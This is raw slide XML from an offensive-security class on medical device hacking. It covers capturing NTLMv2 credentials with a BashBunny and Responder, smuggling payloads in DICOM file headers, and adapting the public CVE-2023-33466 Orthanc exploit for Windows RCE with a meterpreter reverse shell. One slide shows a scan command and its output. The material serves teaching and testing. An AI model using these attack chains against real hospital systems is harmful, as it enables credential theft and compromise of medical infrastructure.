              <a:t>A lack of USB whitelisting allows for unexpected outcomes when using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BashBunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> against the target with the tool Responder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Responder - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/lgandx/Responder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Coupled with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BashBunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>QuickCreds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> payload, the tool Responder runs locally on a system, mimicking an ethernet device and capturing a user’s NTLMv2 credentials (this is 100% of the reason for USB whitelisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you can downgrade to an LM credential, it is mathematically possible to reduce it to a NT hash and allow for PTH attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>QuickCreds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/hak5/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bashbunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-payloads/blob/master/payloads/library/credentials/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>QuickCreds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>payload.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168549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6C04-773B-8B6B-A5D9-CD2EA5906913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMONSTRATION - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BashBunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>QuickCreds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A black and white logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946F6FB9-1818-C574-4A16-76C12CA61800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2904696" y="1606062"/>
            <a:ext cx="6090072" cy="4570901"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="943698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CF27F-486B-2A9B-9CD9-C0816F12E343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="325369"/>
            <a:ext cx="4368602" cy="1956841"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>Repurposing Exploits – DICOM Attack – CVE-2023-33466 – DICOM PolyGlot Files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CBD35E-C40B-FE9F-B07E-0BA161F29CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="2872899"/>
            <a:ext cx="4243589" cy="3320668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>In researching attacks against DICOM, I was reading about vulnerabilities within the DICOM file structure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>The Dicom File header has a 128 byte value that is basically … bullshit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>EX:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>Dicom File: 0002.dcm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>Link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.rubomedical.com/dicom_files/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0CCB33-B6ED-30CF-F747-60B030E0F23F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="1"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27286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B2D5A-12E7-E478-024D-A1D66720A74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="365125"/>
            <a:ext cx="5251316" cy="1807305"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>And ta da!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42B018BE-CAEB-5006-2E23-7EBB9E9821FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2333297"/>
            <a:ext cx="4619621" cy="3843666"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>That is an ad, for the company </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>rubomed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, who has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dicom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> viewer, in the header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Nothing else says trash like an ad.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AF3190F-1D2B-043A-6B7E-A32BB147A075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="4958"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56638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6485-A680-BFEF-FE72-AA3AA83F86A7}"/>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770A472B-BF90-7B0A-744B-62AC302255F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Due to the file header being bogus, it can be replaced by things in order to smuggle executables, launch payloads OR in this case, exploit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DICOM Server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; 1.12 used an insecure method of export that allowed users with access to the application to overwrite files due to excessive service permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server also allows for LUA script execution using the RESTful API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Together, this was a disaster. It still is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the headers are … off.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3086192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E1AB-4353-11F6-3130-AEE13CF74D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Linux RCE to Windows RCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF086BF-C787-0431-C688-D174737FC1DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We are going to repurpose the script so that it works against Windows clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before I started this class, this script did not exist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>We will analyze where the traffic is being sent, then modify our script to accommodate the new paths.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>We will then create a staged scenario where we will host a Python3 HTTP server on port 81/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, create a PowerShell Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> runner with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, then receive a reverse shell back from the target.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168633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9D11-CDC7-75A6-9EBA-EDFC281747E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Medical Device Hacking 101 - Primer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02BAF001-5E8B-A15D-2A25-9BE3C6843852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hacking medical devices can best be described as taking all of your applicable hacking skills, rolling them all together, then letting them go at a target device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Medical Device hacking for me has included the following skillsets:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lockpicking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JTAG/Unknown port comprehension and utilization (IoT board inspection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Applocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Bypasses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local Kiosk Bypasses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PCI/Peripheral exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Analysis and file carving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced AppLocker and Code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Library hijacking and exploit creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom exploit creation in C#, Python, and bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Radiography/Signal sniffing/capture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RFID cloning and tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom DEV board creation and programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s a lot…..like a lot a lot……but you need to start somewhere…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2883013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48C3-D847-9033-8274-8D7AE2FA0D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Windows RCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A592A4F-BB3E-66CB-E133-8C5DA618CEE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the original scripts located at this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/ShielderSec/poc/tree/main/CVE-2023-33466</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> script to scan your host, anything there?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moving the port to port 8042/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, is anything there now?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3510507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48C3-D847-9033-8274-8D7AE2FA0D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Windows RCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A592A4F-BB3E-66CB-E133-8C5DA618CEE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should see this:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ python3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>check.py</a:t>
            </a:r>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hosts.csv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="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Loaded 1 hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Found an open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> at address http://192.168.8.234:8042</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] http://192.168.8.234:8042</a:t>
